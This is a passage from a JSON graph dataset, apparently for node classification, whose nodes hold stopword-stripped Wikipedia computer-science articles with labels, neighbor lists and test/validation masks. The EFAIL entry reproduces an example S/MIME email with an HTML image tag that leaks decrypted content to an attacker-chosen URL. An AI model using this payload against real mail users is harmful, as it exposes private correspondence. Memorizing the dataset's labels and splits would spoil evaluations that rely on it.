      10016,
      8482,
      292,
      10235,
      2345,
      4906,
      1323,
      6442,
      10236,
      7983,
      2355,
      7477,
      8502,
      823,
      10040,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      3913,
      5452,
      6988,
      3918,
      5457,
      6993,
      6483,
      7507,
      9557,
      3414,
      7511,
      2395,
      5470,
      863,
      2401,
      3426,
      1379,
      868,
      3429,
      3938,
      6503,
      8546,
      8551,
      9063,
      5484,
      7020,
      3443,
      5492,
      2933,
      11635,
      375,
      376,
      8573,
      3966,
      7039,
      8063,
      10113,
      11136,
      4996,
      8069,
      394,
      3978,
      4492,
      909,
      7053,
      8077,
      7057,
      9619,
      11673,
      5531,
      10652,
      6557,
      2462,
      5022,
      11675,
      9635,
      421,
      1445,
      935,
      9639,
      4521,
      9643,
      4525,
      9647,
      11184,
      7601,
      1458,
      8114,
      9138,
      9139,
      10676,
      7607,
      5562,
      5051,
      6078,
      9151,
      4546,
      964,
      11204,
      11205,
      9671,
      4040,
      8136,
      5067,
      9166,
      463,
      6098,
      11218,
      4565,
      2519,
      2010,
      1501,
      5603,
      10212,
      1509,
      9189,
      6119,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115,
      9724,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2169,
    "label": 4,
    "text": "HTTP_Public_Key_Pinning:http public key pinning http public key pinning hpkp internet security mechanism delivered via http header allows https websites resist impersonation attackers using mis-issued otherwise fraudulent digital certificates delivering set public keys client e.g web browser ones trusted future connections domain name example attackers might compromise certificate authority mis-issue certificates web origin combat risk https web server serves list “ pinned ” public key hashes valid given time subsequent connections validity time clients expect server use one public keys certificate chain error message shown easily bypassed user contrary common belief technique pin certificates public keys means one use key pair get certificate certificate authority one access private key alternatively also public keys root intermediate certificates created certificate authorities pinned would subsequently allow certificates issued certificate authority mechanism deprecated google chrome team late 2017 complexity dangerous side-effects google recommends using expect-ct safer alternative server communicates hpkp policy user agent via http response header field named codice_1 codice_2 reporting-only purposes hpkp policy specifies hashes subject public key info one certificates website authentic x.509 public key certificate chain least one backup key codice_3 directives period time user agent shall enforce public key pinning codice_4 directive optional codice_5 directive include subdomains domain sent header pinning policy optional codice_6 directive url send pinning violation reports least one public keys certificates certificate chain needs match pinned public key order chain considered valid user agent time publishing rfc 7469 allowed sha-256 hash algorithm hashes hpkp policy generated shell commands mentioned appendix a. rfc 7469 third-party tools website operator choose either pin root certificate public key particular root certificate authority allowing certificate authority intermediate authorities signed key issue valid certificates website domain and/or pin key one intermediate issuing certificates pin end-entity public key least one backup key must pinned case current pinned key needs replaced hpkp valid without backup key backup key defined public key present current certificate chain hpkp standardized rfc 7469 expands static certificate pinning hardcodes public key hashes well-known websites services within web browsers applications browsers disable pinning certificate chains private root certificates enable various corporate content inspection scanners web debugging tools mitmproxy fiddler nowiki rfc 7469 standard recommends disabling pinning violation reports user-defined root certificates acceptable browser disable pin validation. /nowiki user agent performs pin validation fails find valid spki fingerprint served certificate chain post json formatted host specified directive containing details violation uri may served via http https however user agent send hpkp violation reports https uri domain domain reporting violation hosts may either use http codice_6 use alternative domain use reporting service browsers also support codice_2 triggers reporting showing error user hpkp supported firefox opera chrome internet explorer/edge chrome deprecated hpkp release chrome 67",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      8584,
      4490,
      9744,
      1683,
      1688,
      7708,
      3742,
      2083,
      8358,
      5543,
      11693,
      11569,
      9394,
      7736,
      4797,
      9281,
      9412,
      3657,
      5834,
      461,
      10831,
      11345,
      5078,
      5590,
      474,
      9690,
      3805,
      7264,
      8674,
      7139,
      10210,
      101,
      3941,
      4326,
      10341,
      5107,
      501,
      1526,
      503,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2170,
    "label": 7,
    "text": "Mobile_backend_as_a_service:mobile backend service mobile backend service mbaas also known backend service baas model providing web app mobile app developers way link applications backend cloud storage apis exposed back end applications also providing features user management push notifications integration social networking services services provided via use custom software development kits sdks application programming interfaces apis baas relatively recent development cloud computing baas startups dating 2011 later although fairly nascent industry trends indicate services gaining mainstream traction enterprise consumers web mobile apps require similar set features backend including push notifications integration social networks cloud storage services api must individually incorporated app process time-consuming complicated app developers baas providers form bridge frontend application various cloud-based backends via unified api sdk providing consistent way manage backend data means developers need redevelop backend services apps need access potentially saving time money although similar cloud-computing developer tools software service saas infrastructure service iaas platform service paas baas distinct services specifically addresses cloud-computing needs web mobile app developers providing unified means connecting apps cloud services baas provider offers slightly different set backend tools resources among common services provided push notifications file storage sharing integration social networks facebook twitter location services database persistence queries messaging chat functions user management running business logic usage analysis tools baas providers broad focus providing sdks apis work app development multiple platforms ios android blackberry windows phone html5 others baas providers generate revenue services various ways often using freemium model model client receives certain number free active users api calls per month pays fee user call limit alternatively clients pay set fee package allows greater number calls active users per month also flat fee plans make pricing predictable providers offer unlimited api calls inside free plan offerings baas commonly offered commercial service open source options available",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      1959,
      2217,
      5159,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      6208,
      8515,
      3269,
      10820,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      9455,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 2171,
    "label": 4,
    "text": "Cyxymu:cyxymu cyxymu screen name georgian blogger targeted co-ordinated series attacks social networking sites facebook google blogger livejournal twitter taking latter offline two hours august 7 2009 name mimics cyrillic spelling sukhumi сухуми capital town georgian breakaway region abkhazia blogger extensively covers suffering georgian civilians war abkhazia accuses russia trying silence using cyberattacks facebook came defense cyxymu chief security officer max kelly stating “ simultaneous attack across number properties targeting keep voice heard cyxymu russian-language livejournal blog source information georgia news media 2007 state emergency 2008 russo-georgian war cyxymu lj blog previously targeted denial-of-service attacks october 2008 rendering livejournal servers unavailable three times october 26–27 attack cyxymu internationally seen part ongoing cyberwar russia georgia",
    "neighbors": [
      2409,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2172,
    "label": 2,
    "text": "OS/390:os/390 os/390 ibm operating system system/390 ibm mainframe computers os/390 introduced late 1995 effort simplify packaging ordering key entitled elements needed complete fully functional mvs operating system package elements included limited additional benefit os/390 packaging concept improve reliability availability serviceability ras operating system number different combinations elements customer could order run drastically reduced reduced overall time required customers test deploy operating system environments well reducing number customer reported problems pmrs errors apars fixes ptfs arising variances element levels december 2001 ibm extended os/390 include support 64-bit zseries processors added various improvements result named z/os ibm ended support older os/390-branded versions late 2004",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      7053,
      8077,
      9361,
      6675,
      9619,
      789,
      5397,
      11673,
      9370,
      7836,
      6557,
      9724,
      3359,
      10273,
      421,
      9382,
      7848,
      8233,
      6442,
      1323,
      10236,
      5293,
      7983,
      8879,
      7217,
      11184,
      9139,
      10803,
      6325,
      7477,
      4535,
      7733,
      8502,
      5562,
      8889,
      10040,
      573,
      1219,
      964,
      8388,
      6342,
      2250,
      1235,
      7507,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      6242,
      6248,
      9829,
      4586,
      5492,
      375,
      2168,
      3323,
      9468,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2173,
    "label": 3,
    "text": "Martianoids:martianoids martianoids zx spectrum video game developed ultimate play game released 1987 although uses isometric projection ultimate second-generation isometric releases nightshade gunfright martianoids used scrolling display rather flip-screen earlier titles knight lore alien 8 contemporary ultimate title bubbler martianoids written partnership tim stamper chris stamper instead programmed team u.s. gold therefore ultimate game name ultimate penultimate title 8-bit home computers 1988 company became rare embarking long-running partnership nintendo develop console games players given cryptic introduction describing attack aliens known martianoids martianoids enter player ship attack brain ship photon weapons player must act prevent damage player lasers defence destroy internal walls computer components forth aliens",
    "neighbors": [
      320,
      4102,
      9191,
      2792,
      9254,
      9006,
      10931,
      4278,
      5820
    ],
    "mask": "Test"
  },
  {
    "node_id": 2174,
    "label": 2,
    "text": "Storyboard_(Apple_programming):storyboard apple programming storyboards files programmers create create apps ios macos design gui",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2175,
    "label": 4,
    "text": "Citadel_(malware):citadel malware citadel piece massively-distributed malware based upon zeus targets credentials stored password managers keepass password safe nexus personal security client 2017 first identified 2011 citadel infected 11 million computers worldwide caused 500 million losses march 20 2017 extradited norway united states russian computer science professional mark vartanyan pleaded guilty computer fraud charge part developing control panel citadel july 2017 sentenced 5 years federal prison",
    "neighbors": [
      1979,
      2857,
      2508,
      7515,
      10297,
      3867,
      988
    ],
    "mask": "None"
  },
  {
    "node_id": 2176,
    "label": 7,
    "text": "Piranha_(software):piranha software piranha text mining system developed united states department energy doe oak ridge national laboratory ornl software processes large volumes unrelated free-text documents shows relationships amongst technique valuable across numerous scientific data domains health care fraud national security results presented clusters prioritized relevance business government analysts piranha uses term frequency/inverse corpus frequency term weighting method provides strong parallel processing textual information thus ability analyze large document sets piranha six main strengths collecting extracting millions documents numerous sources databases social media collected text extracted hundreds file formats info translated number languages storing indexing documents search servers relational databases etc stored indexed recommending recommending valuable information particular users categorizing grouping items via supervised semi-supervised machine learning methods targeted search lists clustering similarity used create hierarchical group documents visualizing showing relationships among documents users quickly recognize connections work resulted eight issued 9,256,649 8,825,710 8,473,314 7,937,389 7,805,446 7,693,9037 7,315,858 7,072,883 several commercial licenses including textore pro2serve spin-off company inventors covenant health pro2serve called vortext analytics two r 100 awards scores peer reviewed research publications",
    "neighbors": [
      8440,
      1823
    ],
    "mask": "Test"
  },
  {
    "node_id": 2177,
    "label": 9,
    "text": "Michael_Spivey:michael spivey michael spivey commonly known mike spivey british computer scientist university oxford spivey born 1960 educated archbishop holgate grammar school york england studied mathematics christ college cambridge undertook dphil computer science z notation wolfson college oxford programming research group part oxford university computing laboratory mike spivey university lecturer computation oxford university department computer science misys anderson fellow computer science oriel college oxford main areas research interest compilers programming languages especially logic programming wrote oberon-2 compiler",
    "neighbors": [
      1952,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 2178,
    "label": 2,
    "text": "Unslung:unslung unslung open source firmware linksys nslu2 based stock linksys firmware due device running linux therefore licensed subject terms gnu general public license linksys released source code unslung takes linksys firmware expands upon still subject restrictions linksys firmware also removes based old linux 2.4 kernel support newer devices may exist web interface default linksys firmware kept fully functioning except upgrade interface ipkg users able install 1000 optware packages device specially compiled nslu2 unslung 6.10 beta firmware based linksys v2.3r63/a5 firmware minor bugfix/update unslung 6.8",
    "neighbors": [
      10760,
      5067,
      8428,
      5363,
      5397,
      823,
      7483,
      10109,
      8319
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2179,
    "label": 2,
    "text": "List_of_operating_systems:list operating systems list operating systems computer operating systems categorized technology ownership licensing working state usage many characteristics practice many groupings may overlap criteria inclusion notability shown either existing wikipedia article citation reliable source non-unix operating systems still confirmed see also mobile operating systems",
    "neighbors": [
      6155,
      2062,
      4114,
      25,
      10267,
      10273,
      6180,
      8229,
      4151,
      6207,
      2120,
      6218,
      6221,
      2132,
      8280,
      10333,
      96,
      97,
      6248,
      8298,
      8301,
      2159,
      2168,
      2172,
      2179,
      8326,
      10382,
      6289,
      2196,
      6296,
      2201,
      6301,
      8355,
      178,
      6329,
      8388,
      10436,
      6342,
      2248,
      10443,
      2259,
      10451,
      6361,
      8410,
      10458,
      4316,
      6369,
      10475,
      242,
      2290,
      8439,
      2303,
      10499,
      6412,
      273,
      6422,
      8474,
      292,
      2345,
      6445,
      2355,
      4409,
      6459,
      8510,
      321,
      10561,
      10564,
      4423,
      8524,
      2391,
      10590,
      6502,
      8551,
      8553,
      370,
      2422,
      2424,
      376,
      8573,
      8576,
      394,
      6539,
      4492,
      6551,
      4505,
      6557,
      2462,
      8606,
      4515,
      421,
      424,
      4521,
      2477,
      4525,
      10676,
      10680,
      470,
      6624,
      10730,
      10731,
      495,
      8687,
      499,
      8700,
      6652,
      2560,
      8713,
      2573,
      6675,
      10776,
      4637,
      4643,
      557,
      10803,
      10809,
      4669,
      10813,
      8767,
      576,
      2625,
      8774,
      2637,
      10851,
      6760,
      10856,
      6763,
      6772,
      4727,
      634,
      636,
      639,
      8831,
      641,
      6787,
      10883,
      10891,
      6797,
      8876,
      8879,
      689,
      6834,
      6837,
      8889,
      8902,
      2761,
      8907,
      10985,
      8949,
      2811,
      11013,
      8976,
      8977,
      787,
      789,
      823,
      6979,
      11075,
      9033,
      6988,
      4949,
      863,
      868,
      4966,
      7020,
      2925,
      2933,
      7039,
      7053,
      9101,
      7057,
      11153,
      9107,
      5019,
      5022,
      935,
      11184,
      9137,
      2995,
      5043,
      9139,
      9141,
      3007,
      9151,
      11204,
      11205,
      9166,
      989,
      5093,
      3049,
      5105,
      7158,
      5115,
      3089,
      7187,
      11301,
      5158,
      7217,
      1080,
      5177,
      7234,
      3142,
      7243,
      7249,
      3160,
      3162,
      9308,
      11356,
      11363,
      5220,
      7269,
      1126,
      7285,
      9335,
      1147,
      1148,
      3197,
      1150,
      5247,
      11390,
      7307,
      9361,
      5267,
      11411,
      9366,
      7319,
      9370,
      7325,
      5280,
      3241,
      3248,
      3250,
      11447,
      1213,
      7358,
      1219,
      5322,
      3281,
      7382,
      9436,
      1247,
      11489,
      9444,
      1253,
      7403,
      5360,
      5363,
      11513,
      9466,
      9468,
      1278,
      5384,
      11539,
      5397,
      1304,
      3358,
      3359,
      7460,
      7477,
      7480,
      1339,
      7483,
      5452,
      9549,
      11596,
      3409,
      5457,
      7507,
      11601,
      11604,
      7511,
      3426,
      3429,
      5484,
      11635,
      5492,
      11652,
      3463,
      7561,
      9619,
      11667,
      11673,
      11675,
      3487,
      3488,
      1445,
      3493,
      9643,
      7601,
      7607,
      1480,
      3557,
      5619,
      1524,
      1537,
      7682,
      9732,
      3594,
      1561,
      9756,
      3618,
      9762,
      7727,
      7733,
      9784,
      1611,
      5714,
      9820,
      7775,
      9829,
      9831,
      9835,
      7802,
      7806,
      3722,
      9882,
      9887,
      5800,
      7848,
      7849,
      9907,
      5823,
      5824,
      9920,
      1736,
      9931,
      9932,
      3791,
      5840,
      5853,
      5856,
      9964,
      9985,
      7939,
      9991,
      1804,
      3857,
      10007,
      10016,
      7983,
      10040,
      1853,
      7999,
      10051,
      10052,
      10065,
      8020,
      5982,
      10080,
      10104,
      8063,
      10113,
      8069,
      3978,
      8092,
      6049,
      6056,
      1971,
      10170,
      6075,
      6078,
      4040,
      8136,
      6090,
      4051,
      6104,
      10215,
      4074,
      6128,
      10235,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2180,
    "label": 2,
    "text": "GNU_variants:gnu variants gnu variants also called gnu distributions distros short operating systems based upon gnu operating system hurd kernel gnu c library system libraries application software like gnu coreutils bash gnome guix package manager etc. according gnu project others also include operating systems using linux kernel others using bsd-based kernels gnu users usually obtain operating system downloading gnu distributions available wide variety systems ranging embedded devices example librecmc personal computers example debian gnu/hurd powerful supercomputers example rocks cluster distribution hurd official kernel developed gnu system linux-libre also became official gnu package debian gnu/hurd discussed release technology preview debian 7.0 wheezy however plans discarded due immature state system however maintainers debian gnu/hurd decided publish unofficial release release date debian 7.0 debian gnu/hurd considered yet provide performance stability expected production system among open issues incomplete implementation java x.org graphical user interfaces limited hardware driver support two thirds debian packages ported hurd arch hurd derivative work arch linux porting gnu hurd system packages optimised intel p6 architecture goal provide arch-like user environment bsd-style init scripts pacman package manager rolling releases simple set gnu hurd stable enough least occasional use although abandoned 2018 project produced livecd evaluation purposes installations guides livecd conventional installation term gnu/linux gnu+linux used fsf supporters refer operating system linux kernel distributed gnu system software distributions primary installed base gnu packages programs also linux notable official use term distribution debian gnu/linux 2018 gnu variants recommended gnu project regular use linux distributions committed free system distribution guidelines refer gnu/linux like debian actually use deblobbed version linux like linux-libre linux per se debian gnu/kfreebsd operating system ia-32 x86-64 computer architectures distribution gnu debian package management kernel freebsd k kfreebsd abbreviation kernel reflects fact kernel complete freebsd operating system used operating system officially released debian squeeze 6.0 february 6 2011 one debian gnu/kfreebsd live cd ging longer maintained nexenta os first distribution combines gnu userland exception libc opensolaris libc used debian packaging organisation opensolaris kernel nexenta os available ia-32 x86-64 based systems nexenta systems inc initiated project sponsors continued development nexenta os considered gnu variant due use opensolaris libc multiple illumos distributions use gnu userland default cygwin project actively-developed compatibility layer form c library providing substantial part posix api functionality windows well distribution gnu unix-like programs ecosystem first released 1995 cygnus solutions red hat 2016 microsoft canonical added official compatibility layer windows 10 translates linux kernel calls windows nt ones reverse wine allows elf executables run unmodified windows intended provide web developers familiar gnu userland top windows kernel combination dubbed linux windows even though linux i.e operating system family defined common use linux kernel absent",
    "neighbors": [
      2050,
      1028,
      4636,
      3618,
      5177,
      4673,
      8258,
      3142,
      5703,
      10822,
      8266,
      7249,
      1112,
      3674,
      9306,
      1632,
      11363,
      9324,
      9839,
      8304,
      9844,
      5755,
      11388,
      1150,
      5759,
      9343,
      4230,
      9865,
      3744,
      2212,
      4265,
      1718,
      2233,
      5819,
      11459,
      5833,
      8395,
      10455,
      6361,
      7904,
      10464,
      6371,
      3817,
      4841,
      5356,
      9455,
      2804,
      8436,
      1273,
      5380,
      8976,
      274,
      2332,
      8476,
      10012,
      802,
      10535,
      6445,
      7983,
      6962,
      11573,
      823,
      5962,
      850,
      6491,
      7521,
      1891,
      9579,
      9074,
      1394,
      4978,
      2421,
      7027,
      2424,
      7552,
      11654,
      1927,
      4493,
      1939,
      9625,
      1946,
      11180,
      11698,
      5555,
      9148,
      9151,
      10687,
      4561,
      8147,
      2010,
      9696,
      8673,
      998,
      4073,
      1007,
      9201,
      3058,
      3068,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2181,
    "label": 9,
    "text": "List_of_command-line_interpreters:list command-line interpreters computing command-line interpreter command language interpreter blanket term certain class programs designed read lines text entered user thus implementing command-line interface many variants unix shell",
    "neighbors": [
      4870,
      8582,
      2062,
      3216,
      7444,
      3229,
      7325,
      7326,
      9245,
      3876,
      8616,
      9128,
      10413,
      11442,
      692,
      4277,
      9780,
      4409,
      5562,
      10683,
      8509,
      6718,
      8767,
      10304,
      8001,
      4674,
      8644,
      5830,
      8774,
      9927,
      2513,
      5714,
      213,
      2519,
      2520,
      9946,
      2786,
      8675,
      8421,
      2665,
      8554,
      621,
      2670,
      7919,
      9709,
      9839,
      2290,
      3573,
      6134,
      9078,
      3705,
      1147
    ],
    "mask": "Test"
  },
  {
    "node_id": 2182,
    "label": 5,
    "text": "Citrio:citrio citrio free web browser developed catalina group ltd. distributed epom ad server citrio available windows mac os x. citrio download manager includes bittorrent support video downloader media player proxy switcher citrio based open source chromium web browser project makes compatible extensions apps themes chrome web store citrio known trigger warnings antivirus software downloads privacy-invading extensions background users data tracked collected epom purpose selling ads leading categorize citrio adware citrio built-in download manager allows pause resume downloads sorts downloaded files date type download status browser inbuilt bittorrent client allows download torrent files magnet links without additional software citrio ’ video grabber makes possible download files multiple online video websites downloaded torrents videos displayed together downloads respective section browser built-in media player play video files download still progress citrio built-in ad blocking extension citrio browser distributed epom ad server developed catalina group citrio initially released 2013 number core features download manager torrent manager video downloader proxy switcher citrio generally well-reviewed downloading capabilities download manager torrent video downloader others criticized adware security risk misleading promotional materials privacy-invading user data collection february 2015 cnet reviewed citrio following conclusion “ ... download lot media files internet definitely give citrio try offers one easiest ways 've seen download files aside ask toolbar optimization lot like free browser. ” softonic review citrio similarly concludes although citrio promoted secure browser installation programme known set malware warnings considered adware also unable opt installing privacy-invading ask toolbar initial installation still lot like browser ...",
    "neighbors": [
      1664,
      6528,
      6657,
      3971,
      3462,
      7943,
      8584,
      6797,
      2579,
      7572,
      7965,
      10910,
      8351,
      5536,
      5026,
      2213,
      1834,
      9770,
      7340,
      559,
      7983,
      9908,
      4661,
      3639,
      11449,
      4797,
      64,
      10057,
      11466,
      5707,
      7885,
      4048,
      10834,
      4310,
      5078,
      6231,
      6747,
      8923,
      737,
      3428,
      5605,
      4326,
      487,
      8169,
      1642,
      9834,
      877,
      494,
      8557,
      1520,
      7152,
      115,
      9843,
      4728,
      5114,
      8443
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2183,
    "label": 2,
    "text": "ActiveX_Data_Objects:activex data objects computing microsoft activex data objects ado comprises set component object model com objects accessing data sources part mdac microsoft data access components provides middleware layer programming languages ole db means accessing data stores whether databases uniform manner ado allows developer write programs access data without knowing database implemented developers must aware database connection knowledge sql required access database using ado although one use ado execute sql commands directly disadvantage introducing dependency upon type database used microsoft introduced ado october 1996 positioning software successor microsoft earlier object layers accessing data sources including rdo remote data objects dao data access objects ado made four collections twelve objects basic steps required order able access manipulate data using ado asp example using ado select name field table called phonebook phonenumber equal 555-5555 equivalent following asp code uses plain sql instead functionality recordset object ado supported development language supports binding binary com interfaces languages include asp delphi powerbuilder visual basic applications vba ado support added dbase plus 8 ado ado.net replaced ado way c /.net replaced c/win32 primary mode targeting windows application development ado.net follows design pattern ado enabling ado developer easy path forward moving .net framework",
    "neighbors": [
      9728,
      6147,
      10243,
      4614,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      4647,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      8262,
      8781,
      4174,
      4178,
      83,
      9813,
      603,
      2145,
      8804,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      5259,
      653,
      3224,
      4771,
      4261,
      7846,
      10413,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      11571,
      1856,
      5952,
      1348,
      844,
      847,
      853,
      2901,
      10079,
      11616,
      7523,
      2943,
      9609,
      9612,
      8597,
      9114,
      10654,
      8607,
      11683,
      6060,
      6584,
      8122,
      2493,
      7629,
      8161,
      6114,
      6631,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2184,
    "label": 5,
    "text": "Intelligent_Resilient_Framework:intelligent resilient framework intelligent resilient framework irf proprietary software virtualization technology developed h3c 3com core idea connect multiple network devices physical irf ports perform necessary configurations devices virtualized distributed device virtualization technology realizes cooperation unified management non-stop maintenance multiple devices technology follows general concepts cisco vss vpc technologies technology originally developed 3com released 2003 xrn expandable resilient networking hp purchased 3com april 2010 hp renamed technology irf simplified topology streamlined management irf virtual device appears node network log connecting port member manage members irf virtual device companies use technology hewlett packard enterprise hpe formerly hewlett-packard h3c also hpe formerly 3com",
    "neighbors": [
      1638,
      5384,
      7049,
      10937,
      5469,
      5470,
      4671
    ],
    "mask": "Test"
  },
  {
    "node_id": 2185,
    "label": 5,
    "text": "ICMP_Router_Discovery_Protocol:icmp router discovery protocol computer networking icmp internet router discovery protocol irdp also called internet router discovery protocol protocol computer hosts discover presence location routers ipv4 local area network router discovery useful accessing computer systems nonlocal area networks irdp defined ietf rfc 1256 standard internet control message protocol icmp upon based defined ietf rfc 792 irdp eliminates need manually configure routing information enable router discovery irdp defines two kinds icmp messages host boots sends solicitation messages ip multicast address 224.0.0.2 response one routers may send advertisement messages one router host usually picks first message gets adds router routing table independently solicitation router may periodically send advertisement messages messages considered routing protocol determine routing path presence possible gateways irdp strategy used development ipv6 neighbor discovery protocol use icmpv6 messages ipv6 analog icmp messages neighbor discovery governed ietf standards rfc 4861 rfc 4862 irdp plays essential role mobile networking ietf standard rfc 3344 called mipv4 agent discovery",
    "neighbors": [
      649,
      2996,
      5402,
      5469,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 2186,
    "label": 2,
    "text": "GLFW:glfw glfw lightweight utility library use opengl glfw stands graphics library framework provides programmers ability create manage windows opengl contexts well handle joystick keyboard mouse input glfw small c library allows creation management windows opengl contexts making also possible use multiple monitors video modes provides access input keyboard mouse joysticks api provides thin multi-platform abstraction layer primarily applications whose sole graphics output opengl api glfw useful developing multi-platform opengl applications single-platform developers also benefit avoiding deal kludgy platform-specific apis possible reason libraries like glfw needed opengl provide mechanisms creating necessary context managing windows user input timing etc several libraries available aiding opengl development common ones freeglut open source implementation glut sdl however freeglut mostly concerned providing stable clone glut sdl large people never opengl main focus glfw predicated assumption room lightweight modern library managing opengl contexts windows input glfw design although glfw written c bindings exist use api programming languages including ada c common lisp go haskell java python rebol red ruby rust among others glfw version 3.2 experimental support wayland compile-time flags",
    "neighbors": [
      6016,
      3876,
      8554,
      428,
      5165,
      2062,
      5612,
      5677,
      6797,
      7889,
      7983,
      9245,
      9454,
      3734,
      10480,
      11221,
      1435,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2187,
    "label": 4,
    "text": "EFAIL:efail efail also written efail security hole email systems content transmitted encrypted form gap allows attackers access decrypted content email contains active content like html javascript loading external content enabled client affected email clients include gmail apple mail microsoft outlook two related common vulnerabilities exposures ids issued security gap made public 13 may 2018 damian poddebniak christian dresen jens müller fabian ising sebastian schinzel simon friedberger juraj somorovsky jörg schwenk part contribution 27th usenix security symposium baltimore august 2018 result vulnerability content attacked encrypted email transmitted attacker plain text vulnerable email client used encryption keys disclosed security gap concerns many common email programs used email encryption systems openpgp s/mime attacker needs access attacked email message encrypted form well ability send email least one regular recipient original email exploit security gap attacker modifies encrypted email causing recipient email program send decrypted content email attacker access decrypted content encrypted email attacker modifies email attacked contain text prepared attacker specific way attacker sends changed email one regular recipients attacker inserts additional text encrypted text encrypted email thereby changing message multipart/mixed mime message created encrypted part message appears together limit marks mime message parameter value html tag example modified s/mime mail content-type multipart/mixed boundary= boundary -- boundary content-type text/html img src= http //attacker.chosen.url -- boundary content-type application/pkcs7-mime content-transfer-encoding base64 encryptedmessageencryptedmessageencryptedmessageencryptedmessage -- boundary content-type text/html -- boundary email client first breaks multipart message individual parts using codice_1 tag decrypts encrypted parts reassembles multipart message receives message way content-type multipart/mixed boundary= boundary -- boundary content-type text/html img src= http //attacker.chosen.url secretmessagesecretmessage -- boundary message contains decrypted content email codice_2 attribute codice_3 tag passed email program url web server codice_4 controlled attacker content requested attacker retrieve content encrypted message web server logs variant attack attacker uses vulnerability cbc s/mime cfb openpgp operating modes encryption algorithms used allows change ciphertext inserting gadgets side effect manipulation originally contained plain text becomes illegible known attacker correct inserting additional gadgets attacker hide unknown plain text inserting certain html tags result message similar structure described since vulnerability directed content email recipient necessary recipients implement countermeasures include extent even senders encrypted content reduce vulnerability e.g electronic signatures limitation subset mime formats yet conclusively clarified announcing security vulnerability 13 may 2018 electronic frontier foundation eff recommended stop using pgp plugins email programs even though vulnerability directly relate pgp configuration email program coordinated publication originally scheduled 15 may eff criticized ignoring various parties consequence robert hansen recommended establish closed group mailing list better coordinate publication future security issues still saw eff director danny o'brien best entity administer openpgp disclosure group",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      8283,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      4240,
      2709,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      9451,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      1297,
      10003,
      11046,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      3462,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      8671,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 2188,
    "label": 4,
    "text": "CAUCE:cauce cauce coalition unsolicited commercial email non-profit advocacy group works reduce amount unsolicited commercial email spam via legislation cauce founded 1997 participants usenet newsgroup news.admin.net-abuse.email spam-l mailing list cauce north america formed march 2007 merger first cauce cauce us cauce canada combining strengths two sibling cauce organizations cauce na all-volunteer consumer advocacy organization moved beyond original mission encouraging creation adoption anti-spam laws broader stance defending interests average internet user cauce chapters formed canada europe among first lobby effective antispam legislation australia cauce india formed late 1990s 2003 apcauce cauce asia pacific formed bring together cauce chapters asia pacific region hosts technical workshops policy roundtable regional update sessions regional network operator conferences sanog apricot also member anti-spyware coalition cauce around world",
    "neighbors": [
      2677
    ],
    "mask": "Test"
  },
  {
    "node_id": 2189,
    "label": 4,
    "text": "NeoAccel:neoaccel neoaccel multinational company sells computer network security products direct end-user oem relationships company best known ssl vpn-plus product related icaa tssl technology company headquartered san jose california usa development support offices navi mumbai pune india neoaccel founded 2004 former netscaler purchased citrix ceo founder michel susai netscaler developed technology currently accelerates 75 world internet traffic companies like google yahoo aol netscaler purchased citrix 2005 300 million neoaccel financial support venture capital infusions hotmail founder sabeer bhatia inventor prabhu goel 2006 neoaccel raised 4,000,000 baring private equity partners ntt leasing company headquartered san jose california development office navi mumbai india support center pune india sales center beijing jan 2011 neoaccel purchased vmware company holds two main patents secure communications ip based networks neoaccel flagship product ssl vpn-plus company claims fastest vpn available due use icaa tssl technologies product uses ssl transport often categorized ssl vpn although company markets 3rd generation vpn nac-plus companies network access control device released 2007",
    "neighbors": [
      5490,
      939,
      5371
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2190,
    "label": 4,
